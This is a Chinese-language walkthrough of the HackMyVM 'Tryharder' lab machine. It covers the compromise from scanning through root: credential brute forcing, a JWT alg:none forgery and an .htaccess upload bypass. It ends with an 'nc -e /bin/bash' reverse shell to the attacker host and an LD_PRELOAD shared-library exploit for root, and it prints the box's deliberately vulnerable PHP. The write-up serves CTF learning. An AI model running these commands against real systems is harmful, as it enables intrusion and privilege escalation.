HackMyVM-Tryharder-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.130  08:00:27:69:07:dc       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:ed:51:7b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.052 seconds (124.76 hosts/sec). 4 responded
❯ export ip=192.168.60.130
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: Exploring the digital landscape, one IP at a time.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.130:22
Open 192.168.60.130:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-10 08:19 CST
Initiating ARP Ping Scan at 08:19
Scanning 192.168.60.130 [1 port]
Completed ARP Ping Scan at 08:19, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:19
Completed Parallel DNS resolution of 1 host. at 08:19, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 08:19
Scanning 192.168.60.130 [2 ports]
Discovered open port 22/tcp on 192.168.60.130
Discovered open port 80/tcp on 192.168.60.130
Completed SYN Stealth Scan at 08:19, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.60.130
Host is up, received arp-response (0.00034s latency).
Scanned at 2025-04-10 08:19:10 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:69:07:DC (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

目录枚举

❯ gobuster dir -u http://192.168.60.130 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 50 -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.130
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 7371]
Progress: 132920 / 132925 (100.00%)
===============================================================
Finished
===============================================================

查看网页源代码，发现在CSS样式表中有写注释

得到API路径 /NzQyMjE=

❯ curl $ip
…………………………省略………………
    <title>西溪湖科技 - 企业门户网站</title>
    <style>
        :root {
            --primary-color: #2c3e50;
            --secondary-color: #3498db;
            --accent-color: #e74c3c;
            --text-color: #333;
            --light-bg: #f9f9f9;
        /* 调试信息：API路径 /NzQyMjE= */
    </style>
</head>
<body>
    <div class="header">
        <h1 class="logo">西溪湖科技</h1>
        <p class="tagline">创新科技，引领未来</p>
    </div>

    <div class="nav">
        <div class="nav-container">
            <div>
                <a href="#">首页</a>
                <a href="#">关于我们</a>
                <a href="#">产品服务</a>
                <a href="#">解决方案</a>
                <a href="#">新闻动态</a>
                <a href="#">联系我们</a>
            </div>
            <div>
                <a href="#" class="btn">内部登录</a>
            </div>
        </div>
    </div>

    <div class="main-content">
        <div class="hero-section">
            <h2>数字化转型的最佳合作伙伴</h2>
            <p>西溪湖科技致力于为企业提供全方位的数字化解决方案，帮助客户 在数字时代保持竞争力</p>
            <a href="#" class="btn">了解更多</a>
        </div>

        <div class="news-section">
            <h2 class="section-title">最新公告</h2>
            <div class="news-grid">
                <div class="news-item">
                    <h3>系统维护通知</h3>
                    <p>系统将于本周日进行例行维护，维护期间部分功能可能无 法使用。我们将尽量减少对您使用的影响。</p>
                    <a href="#" class="btn">查看详情</a>
                </div>
                <div class="news-item">
                    <h3>公司新闻</h3>
                    <p>公司成功举办2024年度技术研讨会，多位行业专家参与交 流，共同探讨人工智能与大数据的未来发展。</p>
                    <a href="#" class="btn">查看详情</a>
                </div>
                <div class="news-item">
                    <h3>产品更新</h3>
                    <p>我们的旗舰产品"数据安全卫士"已发布最新版本，新增多 项安全防护功能，提升企业数据安全水平。</p>
                    <a href="#" class="btn">查看详情</a>
                </div>
            </div>
        </div>
    </div>

    <div class="footer">
        <p>© 2024 西溪湖科技有限公司 版权所有 | 浙ICP备XXXXXXXX号</p>
    </div>

    <script>
        document.addEventListener('DOMContentLoaded', function() {
            // 页面加载完成后的初始化代码
            console.log('页面加载完成');
        });
    </script>
</body>
</html>

base64解码一下

❯ echo "NzQyMjE="|base64 -d
74221

尝试再次枚举这个目录，同时浏览器访问一下

❯ gobuster dir -u http://192.168.60.130/74221/ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt -t 50 -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.130/74221/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-medium-files-lowercase.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 2174]
/.                    (Status: 200) [Size: 2174]
/dashboard.php        (Status: 302) [Size: 0] [--> index.php]
Progress: 81220 / 81225 (99.99%)
===============================================================
Finished
===============================================================

JWT 漏洞

有个登录表单，经过尝试好像不存在admin用户

只能尝试爆破了，在这里我尝试了很多字典，最后终于是爆出来了

❯ wfuzz -c -u "http://192.168.60.130/74221/index.php" -d "username=FUZZ&password=FUZ2Z" -H "User-Agent:Mozilla/5.0" -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -w 5000.txt --hw 167
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.60.130/74221/index.php
Total requests: 85000

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000010001:   302        0 L      0 W        0 Ch        "test - 123456"

Total time: 38.70372
Processed Requests: 68806
Filtered Requests: 68805
Requests/sec.: 1777.761

进来之后会提示你不是admin

因此没有文件上传的功能

我们可以看到登录成功后会给一个Cookie，很明显是JWT编码

❯ vim hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2025-04-10 09:03) 0g/s 11661Kp/s 11661Kc/s 11661KC/s "chinor23"..*7¡Vamos!
Session completed.

爆破无果后，我尝试将算法修改为 None

JWT 漏洞 （Json Web 令牌） - HackTricks

修改一下Cookie即可拿到admin权限

.htaccess 上传漏洞

经过不断尝试，文件上传绕过

发现.htaccess可以上传，我们修改内容，将带有扩展名.png的文件都视为 PHP 脚本进行解析和执行

然后再随意上传个反弹shell，修改后缀或者添加后缀为png即可

用户提权

kali监听端口

❯ penelope.py
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.60.100
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from Tryharder-192.168.60.130-Linux-x86_64 😍️ Assigned SessionID <1>
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [1], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Tryharder~192.168.60.130_Linux_x86_64/2025_04_10-09_32_25-274.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
www-data@Tryharder:/$

我简单看了一下jwt的代码逻辑

原来还真是弱密码，只不过我字典用的不对

作者留了两个口子，新手福利🤣

www-data@Tryharder:/var/www/html/74221$ cat jwt.php
<?php
function base64UrlEncode($data) {
    return rtrim(strtr(base64_encode($data), '+/', '-_'), '=');
}

function base64UrlDecode($data) {
    return base64_decode(strtr($data, '-_', '+/'));
}

function generateJWT($payload) {
    $header = ['alg' => 'HS256', 'typ' => 'JWT'];
    $secret = 'jwtsecret123'; // 弱密钥

    $headerEncoded = base64UrlEncode(json_encode($header));
    $payloadEncoded = base64UrlEncode(json_encode($payload));
    $signature = hash_hmac('sha256', "$headerEncoded.$payloadEncoded", $secret, true);
    $signatureEncoded = base64UrlEncode($signature);

    return "$headerEncoded.$payloadEncoded.$signatureEncoded";
}

function verifyJWT($token) {
    $parts = explode('.', $token);
    if (count($parts) !== 3) return false;

    [$headerEncoded, $payloadEncoded, $signatureEncoded] = $parts;
    $header = json_decode(base64UrlDecode($headerEncoded), true);
    $payload = json_decode(base64UrlDecode($payloadEncoded), true);
    $secret = 'jwtsecret123';

    // 漏洞：支持alg: none
    if ($header['alg'] === 'none') {
        return $payload; // 无签名验证
    }

    $expectedSignature = hash_hmac('sha256', "$headerEncoded.$payloadEncoded", $secret, true);
    $signature = base64UrlDecode($signatureEncoded);

    if (hash_equals($expectedSignature, $signature) && $payload['exp'] > time()) {
        return $payload;
    }
    return false;
}

在seclists中有个专门jwt的字典

❯ grep -nri "jwtsecret123" /usr/share/seclists/
/usr/share/seclists/Passwords/scraped-JWT-secrets.txt:2417:jwtSecret123
/usr/share/seclists/Passwords/scraped-JWT-secrets.txt:2429:jwtsecret1234jwtsecret1234jwtsecret1234jwtsecret1234
/usr/share/seclists/Passwords/scraped-JWT-secrets.txt:103929:jwtsecret123
❯ john hash --wordlist=/usr/share/seclists/Passwords/scraped-JWT-secrets.txt
Using default input encoding: UTF-8
Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 256/256 AVX2 8x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
jwtsecret123     (?)
1g 0:00:00:00 DONE (2025-04-10 09:39) 50.00g/s 5193Kp/s 5193Kc/s 5193KC/s vhtpc4600..!@2222222fasdhiohDCWQA
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

然后文件上传部分的主要逻辑也是作者故意留了个htaccess的后缀

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['file'])) {
    $file = $_FILES['file'];
    $filename = basename($file['name']);
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    $allowed = ['jpg', 'png', 'htaccess'];

    if (in_array($ext, $allowed)) {
        $target = "$upload_dir/$filename";
        if (move_uploaded_file($file['tmp_name'], $target)) {
            $display_path = "./uploads/$user_id/$filename";
            $message = "File uploaded successfully: <a href='$display_path'>$display_path</a>";
        } else {
            $error = "Upload failed! Path: $upload_dir, Error: " . $_FILES['file']['error'];
        }
    } else {
        $error = "Only .jpg and .png  files are allowed!";
    }
} else {
    $error = "No file uploaded or invalid request.";
}
?>

好了继续信息收集

得知存在两个用户pentester xiix

好像这两个用户都存在备注

www-data@Tryharder:/tmp$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
pentester:x:1000:1000:Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight...:/home/pentester:/bin/bash
xiix:x:1001:1001:A Tale of Two Cities:/home/xiix:/bin/bash

翻译了一下，发现是双城记开篇的名句，但是夹杂了一些特殊符号，可能是以这些特殊符号作为分隔

Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight
那是最美好的时代，那是最糟糕的时代；那是智慧的年头，那是愚昧的年头；那是信仰的时期，那是怀疑的时期；那是光明的季节

还有user flag用户www-data是直接可以读的

www-data@Tryharder:/home/pentester$ cat user.txt
Flag{c4f9375f9834b4e7f0a528cc65c055702bf5f24a}

另外在用户家目录下还有一个提示

Caesar凯撒加密之类的

www-data@Tryharder:/home/pentester$ cat .note
Two cities clashed in tale: Smash Caesar, buddy, to pass.
两个城市在传说中发生了冲突：摧毁凯撒，伙计，才能通过。

发现本地开放8989端口

尝试转发出来

www-data@Tryharder:/tmp$ ss -luntp
Netid  State   Recv-Q  Send-Q   Local Address:Port     Peer Address:Port
udp    UNCONN  0       0              0.0.0.0:68            0.0.0.0:*
tcp    LISTEN  0       5            127.0.0.1:8989          0.0.0.0:*
tcp    LISTEN  0       128            0.0.0.0:22            0.0.0.0:*
tcp    LISTEN  0       128                  *:80                  *:*
tcp    LISTEN  0       128               [::]:22               [::]:*
[!] Session detached ⇲
(Penelope)─(Session [1])> portfwd 0.0.0.0:8989<-127.0.0.1:8989
[+] Setup Port Forwarding: 0.0.0.0:8989 <- 127.0.0.1:8989

利用nc连接一下，提示访问被拒绝

❯ nc 127.0.0.1 8989
aaa
Enter password: Access denied!

上传一个pspy64，监测一下系统进程

发现系统会每分钟执行/srv/backdoor.py

2025/04/09 22:54:01 CMD: UID=0     PID=22533  | /usr/sbin/CRON -f
2025/04/09 22:54:01 CMD: UID=0     PID=22534  | /usr/sbin/CRON -f
2025/04/09 22:54:01 CMD: UID=1001  PID=22535  | /bin/sh -c /srv/backdoor.py

然而backdoor.py是隶属于xiix的，其他用户不可读

并且还存在一个隐藏文件...

www-data@Tryharder:/srv$ ls -la
total 16
drwxr-xr-x  2 root root 4096 Mar 23 23:42 .
drwxr-xr-x 18 root root 4096 Nov 13  2020 ..
-rw-r--r--  1 root root  161 Mar 23 11:28 ...
-rwx------  1 xiix xiix 1012 Mar 23 23:42 backdoor.py
www-data@Tryharder:/srv$ cat ...
Iuwbtthfbetuoftimfs"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,'iuwasuhesfasooofLjgiu../

这里我卡了一会，问了下作者拿点提示，其实就是ctf中常见的加密方式

你可以发现这两段密文，有些地方相同 有些地方不同

❯ diff 1 2
1c1
< Iuwbtthfbetuoftimfs"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,'iuwasuhesfasooofLjgiu../
---
> Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight...

将他们都转为ascii十进制，比较发现，密文二是密文一部分ascii+1得来

也就是相同的ascii码比作0，不同的比作1

让GPT给出python脚本

def binary_diff_analysis(cipher1, cipher2):
    # 长度对齐处理
    min_len = min(len(cipher1), len(cipher2))
    trunc1 = cipher1[:min_len]
    trunc2 = cipher2[:min_len]

    # 生成差异位图
    diff_bitmap = []
    for c1, c2 in zip(trunc1, trunc2):
        if c1 == c2:
            diff_bitmap.append(0)
        else:
            # 检测是否为+1差异
            if (ord(c2) - ord(c1)) % 256 == 1:
                diff_bitmap.append(1)
            else:
                diff_bitmap.append(1)  # 非+1差异也标记为1

    return diff_bitmap

def binary_to_ascii(diff_bitmap):
    # 将位图列表转为二进制字符串
    bin_str = ''.join(map(str, diff_bitmap))

    # 填充为8的倍数长度
    padding = (8 - len(bin_str) % 8) % 8
    padded_str = bin_str + '0' * padding

    # 分割并转换ASCII
    ascii_str = ''
    for i in range(0, len(padded_str), 8):
        byte = padded_str[i:i+8]
        decimal = int(byte, 2)
        # 过滤非打印字符（32-126为可打印ASCII）
        ascii_str += chr(decimal) if 32 <= decimal <= 126 else '�'

    return ascii_str

# 示例使用
cipher1 = "Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight..."
cipher2 = "Iuwbtthfbetuoftimfs\"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,'iuwasuhesfasooofLjgiu../"

# 生成差异位图
diff_map = binary_diff_analysis(cipher1, cipher2)
print("二进制为:", ''.join(map(str, diff_map[:64])))  # 仅打印前64位示例

# 转换为ASCII
result = binary_to_ascii(diff_map)
print("\nASCII解码结果:", result)

尝试运行一下，得到密码Y0U_5M4SH3D_17_8UDDY

用nc连接一下

❯ nc 127.0.0.1 8989
Y0U_5M4SH3D_17_8UDDY
Enter password: Access granted!
shell> id
uid=1001(xiix) gid=1001(xiix) groups=1001(xiix)

shell>shell> nc -e /bin/bash 192.168.60.100 1234

监听端口

在用户xiix家目录中存在脚本

[+] Got reverse shell from Tryharder-192.168.60.130-Linux-x86_64 😍️ Assigned SessionID <4>
(Penelope)─(Session [3])> use 4
(Penelope)─(Session [4])> interact
[+] Attempting to upgrade shell to PTY...
[+] Shell upgraded successfully using /usr/bin/python3! 💪
[+] Interacting with session [4], Shell Type: PTY, Menu key: F12
[+] Logging to /home/Pepster/.penelope/Tryharder~192.168.60.130_Linux_x86_64/2025_04_10-13_06_22-184.log 📜
──────────────────────────────────────────────────────────────────────────
xiix@Tryharder:~$ ./guess_game
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单： 我心里有个数字（0-99），你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了，我就把属于你的东西给你；猜错了？嘿嘿，后果自负！
Guess right, I’ll give your reward; wrong? Hehe, face the consequences!
提示： 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
输入你的猜测（0-99） / Your guess (0-99):

既然范围只有0-99，那我直接硬猜，跑一下循环总有一个能出来

拿到用户xiix的密码superxiix

xiix@Tryharder:~$ for i in {1..100}; do echo 3 | ./guess_game; done
…………………………省略…………………………
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单： 我心里有个数字（0-99），你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了，我就把属于你的东西给你；猜错了？嘿嘿，后果自负！
Guess right, I’ll give your reward; wrong? Hehe, face the consequences!
提示： 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
天哪！你居然猜对了！运气逆天啊！ / You got it! Amazing luck!
Pass: superxiix

---

上面的是常规思路，问了下群友，还有两个口子

pspy64 监测进程

新开一个tty，在执行guess_game的同时，监听一下

其实不太常用，默认的就是-p参数，但这只能查看系统命令

利用-f参数查看文件系统事件

除了前面一大串调用了一堆链接库之外最后还在tmp目录下创建了.hidden_clue

root@Tryharder:/home/xiix# ./guess_game
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单： 我心里有个数字（0-99），你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了，我就把属于你的东西给你；猜错了？嘿嘿，后果自负！
Guess right, I’ll give your reward; wrong? Hehe, face the consequences!
提示： 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
输入你的猜测（0-99） / Your guess (0-99):
-----------------------------------------------
#另一个tty
2025/04/10 03:26:27 CMD: UID=0     PID=17973  | bash
2025/04/10 03:26:27 FS:               ACCESS | /home/xiix/guess_game
2025/04/10 03:26:27 FS:               ACCESS | /home/xiix/guess_game
2025/04/10 03:26:27 FS:               ACCESS | /home/xiix/guess_game
…………………………省略链接库…………………………
2025/04/10 03:26:27 FS:               MODIFY | /tmp/.hidden_clue
2025/04/10 03:26:27 FS:                 OPEN | /tmp/.hidden_clue
2025/04/10 03:26:27 FS:               MODIFY | /tmp/.hidden_clue
2025/04/10 03:26:27 FS:          CLOSE_WRITE | /tmp/.hidden_clue

.hidden_clue即为随机数

root@Tryharder:/tmp# cat .hidden_clue
30
root@Tryharder:/home/xiix# ./guess_game
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单： 我心里有个数字（0-99），你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了，我就把属于你的东西给你；猜错了？嘿嘿，后果自负！
Guess right, I’ll give your reward; wrong? Hehe, face the consequences!
提示： 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
输入你的猜测（0-99） / Your guess (0-99): 30
天哪！你居然猜对了！运气逆天啊！ / You got it! Amazing luck!
Pass: superxiix

env 信息泄露

观察env发现有个变量DEBUG_MODE

xiix@Tryharder:/tmp$ env
SHELL=/bin/bash
DEBUG_MODE=1337
PWD=/tmp
LOGNAME=xiix
XDG_SESSION_TYPE=tty
HOME=/home/xiix
LANG=en_US.UTF-8
XDG_SESSION_CLASS=user
TERM=xterm-256color
USER=xiix
SHLVL=5
XDG_SESSION_ID=177
XDG_RUNTIME_DIR=/run/user/0
PATH=/usr/bin:/bin
MAIL=/var/mail/xiix
OLDPWD=/home/xiix
_=/usr/bin/env

可以猜测为guess_game的调试代码，同样也能显示密码

xiix@Tryharder:/home/xiix# ./guess_game
===== 终极运气挑战 / Ultimate Luck Challenge ====
规则很简单： 我心里有个数字（0-99），你有一次机会猜。
I have a number (0-99), you get one guess.
猜对了，我就把属于你的东西给你；猜错了？嘿嘿，后果自负！
Guess right, I’ll give your reward; wrong? Hehe, face the consequences!
提示： 聪明人也许能找到捷径。
Hint: Smart ones might find a shortcut.
输入你的猜测（0-99） / Your guess (0-99): 1337
后门激活！ / Backdoor activated!
Pass: superxiix

Root提权

用户拥有sudo权限，可以执行whoami，但仅通过whoami执行任意命令几乎不可能

xiix@Tryharder:~$ sudo -l
Matching Defaults entries for xiix on tryharder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=LD_PRELOAD

User xiix may run the following commands on tryharder:
    (ALL : ALL) /bin/whoami

不过你仔细观察会发现sudo有个设置env_keep+=LD_PRELOAD即环境变量 LD_PRELOAD 被保留

所以可以劫持 /bin/whoami 调用的函数（如 puts、printf 等），注入恶意代码

其实有点像之前做到过的Listen1 1那个靶机，但不完全一样

[HackMyVM-Listen1 1-Walkthrough | Pepster’Blog](https://pepster.me/HackMyVM-Listen 1 1/#恶意库注入)

具体利用方案可以参考

Linux 权限提升 - HackTricks

xiix@Tryharder:~$ vi exp.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

// 劫持一个会被 /bin/whoami 调用的函数（例如 puts）
int puts(const char *s) {
    // 提权操作：启动一个 root shell
    setuid(0);
    setgid(0);
    system("/bin/sh");
    return 0;  // 为了不破坏原程序流程
}
xiix@Tryharder:~$ gcc -shared -fPIC exp.c -o exp.so
xiix@Tryharder:~$ sudo LD_PRELOAD=/home/xiix/exp.so /bin/whoami
# id
uid=0(root) gid=0(root) groups=0(root)
# bash
root@Tryharder:/home/xiix# cd ~
root@Tryharder:~# ls
1.c  congrats.txt  root.txt
root@Tryharder:~# cat root.txt
Flag{7ca62df5c884cd9a5e5e9602fe01b39f9ebd8c6f}
root@Tryharder:~# cat congrats.txt
        ____  ____  ____  ____  ____  ____  ____  ____  ____  ____  _
       /    \/    \/    \/    \/    \/    \/    \/    \/    \/    \/ \
      /_______________________________________________________________\
      |                                                               |
      |  *** CONGRATULATIONS! YOU'VE CONQUERED THE TARGET RANGE! ***  |
      |_______________________________________________________________|

   YOU ARE A TRUE HACKER LEGEND!
   The Xiixhu Tech bows to your skills!

   What's Next?
   - Join our elite crew!
   - QQ Group: 660930334
   - Welcome aboard, mastermind!

   Try Harder!
   Keep hacking, keep winning!

   [ Tip: Root password is hidden in the congrats message! Dig deeper! ]

        ____  ____  ____  ____  ____  ____  ____  ____  ____  ____  _
       /    \/    \/    \/    \/    \/    \/    \/    \/    \/    \/ \
      /_______________________________________________________________\
      |                                                               |
      |  *** 恭喜！您已征服目标范围！ ***                                |
      |_______________________________________________________________|

   您是真正的黑客传奇！
   Xiixhu Tech为您的技能折服！

   接下来是什么？
   - 加入我们的精英团队！
   - QQ群：660930334
   - 欢迎加入，策划大师！

   再接再厉！
   继续黑客之路，继续赢取胜利！

   [ 提示：Root密码隐藏在祝贺信息中！深入挖掘吧！ ]